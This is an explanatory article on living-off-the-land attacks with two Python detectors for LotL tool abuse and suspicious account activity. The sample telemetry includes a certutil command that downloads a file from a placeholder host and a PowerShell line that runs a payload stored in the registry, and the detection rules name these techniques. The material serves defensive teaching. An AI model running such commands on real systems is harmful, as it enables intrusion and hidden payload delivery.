Every company’s security provisions and network structures are multi-layered. A hacker gaining unauthorised access to one area of the network doesn’t necessarily mean they can steal data or affect operations in another.
However, in some situations an attacker is able to take the resources that they initially gain access to, primarily operating system features or network administrator tools, and use them to extend their infiltration. More and more, attackers are leveraging machine identities to hijack machine-to-machine connections and communications to move laterally through a network.
This is known as living off the land (LotL) and it is a growing problem for cybersecurity experts. In this post we explain how LotL attacks are carried out, how they can be identified and what you can do to mitigate the problem.
Any intrusion that involves a malicious attacker deploying a network’s own tools against it to extend the attack has elements of a LotL approach.
Such attacks are sometimes described as fileless or zero-footprint attacks as they don't require the installation of malware from an external source. This makes them very difficult for antivirus tools to detect accurately as there are no indicators of outside connections, data exchange or interference.
LotL attacks can also be highly effective. The Ponemon Institute's State of Endpoint Security Risk Report found that fileless attacks are about ten times more likely to succeed than file-based attacks.
A living off the land attack usually follows three stages:
Gaining entry – while companies increasingly optimize security to guard against malware, less attention is sometimes paid to securing remote access systems. A company’s Virtual Private Network (VPN) or other remote access solution can be used by a wide range of internal and external stakeholders, including third-party contractors, and be a critical vulnerability when not properly secured.
Moving laterally – once inside a network an attacker living off the land will then use credentials, systems, and tools they have identified and accessed within it to move to other areas. This may be done by simply accessing new directories and data, or by setting up fake administrator accounts in order to change network settings.
Data theft and network damage – once they have access to the tools, permissions and directories needed the attacker can then carry out their malicious purpose. This will often be some form of personal data theft or operational disruption.
Symantec states that attackers who are living off the land will usually use one of four approaches, three of which are described below:
Dual-use tools – hijacking of tools that are used to manage networks and systems which give the attacker the ability to traverse networks, run commands, steal data and even download additional programs or malware. Examples are File Transfer Protocol (FTP) clients or system functions such as PsExec, a Microsoft Sysinternals tool that is used for the execution of processes on other systems.
Fileless persistence – a form of attack in which a malicious infection can remain on the system after a reboot even though it was never written to the hard disk. This is usually achieved by storing malicious scripts, such as Visual Basic Script (VBS) code, in the Windows Registry and having them executed from there.
Memory-only threats – in which the harmful payload is executed directly in memory. This is a well-established technique: in 2001, for example, the memory-only Code Red worm infected a large number of systems through a vulnerability in Microsoft's IIS web server.
Attacks may involve activities in one or more of these categories and there have been a number of combined threats identified over the years.
One of the major living off the land attacks occurred in January 2018. It was found that a large telecommunications operator in Southeast Asia had been infiltrated by attackers who were using internal tools and systems to avoid detection.
Once the system vulnerability and the attackers’ behaviour pattern had been noticed, the same activity was identified at several other companies in the region, including businesses in the communications, defence and even satellite operations sectors.
The hackers, who became known as Thrip, were attempting to remotely install the malware Infostealer.Catchamas without tipping off system security personnel about their presence and activity.
Such behaviour is another hallmark of a LotL attack. While moving and navigating within the network, using its own tools and functions, attackers will try to carry out “normal” activities in order to remain undetected for as long as possible. This often means that attacks aren’t spotted for weeks or even months.
The first line of defence is to limit the possibility of illicit access to the network. It is important that two-factor authentication and effective credential management are in place on all VPNs and remote access systems.
A sophisticated approach to overseeing user and machine identities will narrow the attack surface available to malicious actors, making it harder for them to gain access and move laterally in the network.
Companies with lost or compromised keys and certificates are particularly at risk. Stolen keys and login credentials can give attackers initial access to otherwise private and encrypted areas.
Attackers have also abused system features that help manage certificates. For example, the Windows program CertUtil (used to download and update certificates) has been used to fetch additional malicious payloads once users have been enticed to open compromised files.
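The dual-use tool, fileless persistence and CertUtil patterns described above all leave traces in process-creation telemetry, and that is where defenders most often catch them. The following is an added example, not code from the original post or from Symantec: a small heuristic scanner over process-creation events. It assumes a simplified JSON-lines export with the fields time, host, user, parent_image, image and cmdline (modelled loosely on Sysmon Event ID 1 / Windows 4688; the field names, the rule names and the list of document applications are assumptions), and every sample event is constructed with placeholder hosts and URLs.

```python
"""Flag living-off-the-land tool abuse in process-creation telemetry.

Added example, not code from the original post. It assumes process-creation
events exported as JSON lines with the fields time, host, user, parent_image,
image and cmdline (modelled loosely on Sysmon Event ID 1 / Windows 4688; the
field names are an assumption). Every sample event below is constructed.
"""
import json
import re
from dataclasses import dataclass

# Parents that should not normally launch a script host or certutil (assumed list).
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}


@dataclass(frozen=True)
class Finding:
    time: str
    host: str
    rule: str
    cmdline: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyse_event(ev: dict) -> list[Finding]:
    """Apply the LotL heuristics to one process-creation event."""
    image = _basename(ev["image"])
    parent = _basename(ev.get("parent_image", ""))
    cmd = ev.get("cmdline", "")
    cmd_l = cmd.lower()
    hits: list[Finding] = []

    def flag(rule: str) -> None:
        hits.append(Finding(ev["time"], ev["host"], rule, cmd))

    # 1. certutil driven as a downloader or decoder instead of a certificate tool.
    if image == "certutil.exe" and re.search(r"-(urlcache|decode|encode)\b", cmd_l):
        flag("certutil-download-or-decode")

    # 2. PsExec-style remote execution: psexec.exe itself, or a child of the
    #    PSEXESVC service that PsExec installs on the remote machine.
    if image == "psexec.exe" or parent == "psexesvc.exe":
        flag("psexec-remote-execution")

    # 3. Script host whose command line pulls its payload from the registry,
    #    the pattern behind fileless persistence.
    if image in SCRIPT_HOSTS and re.search(r"\bhk(lm|cu|ey_)|registry::", cmd_l):
        flag("script-host-reads-registry")

    # 4. Document viewer spawning a script host or certutil: the lure-then-LotL chain.
    if parent in DOCUMENT_APPS and (image in SCRIPT_HOSTS or image == "certutil.exe"):
        flag("document-app-spawned-lotl-tool")

    return hits


def scan(jsonl_text: str) -> list[Finding]:
    """Run the heuristics over a JSON-lines export and return all findings."""
    findings: list[Finding] = []
    for line in jsonl_text.splitlines():
        if line.strip():
            findings.extend(analyse_event(json.loads(line)))
    return findings


# Constructed sample telemetry (hosts, users and URLs are placeholders).
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"time": "2024-01-05T09:12:01Z", "host": "ws01", "user": "jdoe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -verify C:\\certs\\server.cer"},          # legitimate use
    {"time": "2024-01-05T09:14:33Z", "host": "ws01", "user": "jdoe",
     "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://example.invalid/u.bin u.bin"},
    {"time": "2024-01-05T09:20:10Z", "host": "srv07", "user": "SYSTEM",
     "parent_image": r"C:\Windows\PSEXESVC.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c whoami"},
    {"time": "2024-01-05T09:25:45Z", "host": "ws01", "user": "jdoe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c (Get-ItemProperty HKCU:\\Software\\Demo).Payload"},
])

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.time} {f.host} {f.rule}: {f.cmdline}")
```

The first sample event is a legitimate certificate check and produces nothing; the other three each trip at least one rule, and the Word-spawned certutil download trips two. Rules of this kind are deliberately narrow and cheap; in practice they are tuned against a baseline of how administrators in the environment actually use these tools, since the whole point of LotL is that the same binaries appear in benign activity.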
The ability to analyse and monitor identity creation and use will also make it more likely that the behaviour of an infiltrator will be spotted in the first place (remember that attackers living off the land usually behave in ways that make it hard to identify the attack).
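Monitoring identity creation and use, as the paragraph above recommends, and the fake administrator accounts mentioned under lateral movement, both reduce to a few checks over account-management and logon events. The following is an added example, not code from the original post: it assumes a simplified JSON-lines export of three Windows security event types, 4720 (user account created), 4732 (member added to a security-enabled local group) and 4624 (successful logon), with the field names, the provisioning allow-list and the thresholds all being assumptions; every sample event is constructed.

```python
"""Spot suspicious identity creation and use in Windows security-log exports.

Added example, not code from the original post. It assumes a simplified
JSON-lines export keyed by Windows event ID: 4720 (user account created),
4732 (member added to a security-enabled local group) and 4624 (successful
logon). Field names, the provisioning allow-list and the thresholds are
assumptions; all sample events are constructed.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Identities that legitimately create accounts (assumed; a real deployment
# would take this list from the IAM/provisioning system).
PROVISIONING_ACCOUNTS = {"svc-iam-provisioner"}
ADMIN_GROUPS = {"administrators", "domain admins", "remote desktop users"}
FAST_ESCALATION = timedelta(minutes=30)   # new account made admin within this window
FANOUT_WINDOW = timedelta(hours=1)        # logons to FANOUT_HOSTS distinct hosts ...
FANOUT_HOSTS = 3                          # ... within the window look like lateral movement


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def analyse_identity_events(jsonl_text: str) -> list[dict]:
    """Return alerts for out-of-band account creation, fast privilege grants
    and one account fanning out across many hosts."""
    events = [json.loads(l) for l in jsonl_text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["time"])          # ISO-8601 strings sort chronologically
    created: dict[str, dict] = {}                 # account -> its 4720 event
    logons: dict[str, list] = defaultdict(list)   # account -> [(time, host), ...]
    fanout_alerted: set[str] = set()
    alerts: list[dict] = []

    for e in events:
        eid, t = e["event_id"], _ts(e["time"])
        if eid == 4720:
            acct = e["target"].lower()
            created[acct] = e
            # Rule 1: account created by something other than the provisioning identity.
            if e["subject"].lower() not in PROVISIONING_ACCOUNTS:
                alerts.append({"time": e["time"], "rule": "account-created-outside-provisioning",
                               "account": acct, "by": e["subject"]})
        elif eid == 4732:
            acct, group = e["member"].lower(), e["group"].lower()
            c = created.get(acct)
            # Rule 2: brand-new account granted an admin group shortly after creation.
            if group in ADMIN_GROUPS and c is not None and t - _ts(c["time"]) <= FAST_ESCALATION:
                alerts.append({"time": e["time"], "rule": "new-account-made-admin",
                               "account": acct, "group": e["group"], "by": e["subject"]})
        elif eid == 4624:
            acct = e["target"].lower()
            logons[acct].append((t, e["host"]))
            # Rule 3: one account reaching many hosts in a short window (fan-out).
            recent = {h for lt, h in logons[acct] if t - lt <= FANOUT_WINDOW}
            if len(recent) >= FANOUT_HOSTS and acct not in fanout_alerted:
                fanout_alerted.add(acct)          # fire once per account
                alerts.append({"time": e["time"], "rule": "logon-fanout",
                               "account": acct, "hosts": sorted(recent)})
    return alerts


# Constructed sample events (accounts and hosts are placeholders).
SAMPLE_IDENTITY_EVENTS = "\n".join(json.dumps(e) for e in [
    {"time": "2024-01-06T02:03:10Z", "event_id": 4720, "host": "dc01",
     "subject": "jdoe", "target": "svc-backup2"},
    {"time": "2024-01-06T02:05:40Z", "event_id": 4732, "host": "dc01",
     "subject": "jdoe", "member": "svc-backup2", "group": "Administrators"},
    {"time": "2024-01-06T02:10:02Z", "event_id": 4624, "host": "srv01", "target": "svc-backup2"},
    {"time": "2024-01-06T02:12:47Z", "event_id": 4624, "host": "srv02", "target": "svc-backup2"},
    {"time": "2024-01-06T02:15:19Z", "event_id": 4624, "host": "srv03", "target": "svc-backup2"},
    {"time": "2024-01-06T02:18:55Z", "event_id": 4624, "host": "srv04", "target": "svc-backup2"},
    {"time": "2024-01-06T09:00:00Z", "event_id": 4720, "host": "dc01",
     "subject": "svc-iam-provisioner", "target": "asmith"},          # routine onboarding
    {"time": "2024-01-06T15:00:00Z", "event_id": 4732, "host": "dc01",
     "subject": "helpdesk", "member": "asmith", "group": "Remote Desktop Users"},
])

if __name__ == "__main__":
    for a in analyse_identity_events(SAMPLE_IDENTITY_EVENTS):
        print(a)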
In addition, ensuring that data exchange between tools and system functions inside the network is effectively encrypted will also limit the damage an attacker can do if they do get inside undetected.
Ultimately, an attacker who is living off the land has a finite set of resources available: the tools and systems they can access once they’ve infiltrated a network. By limiting which of the potentially harmful features they can access and what they are able to do with them, a LotL attack can hopefully be identified and stopped much faster.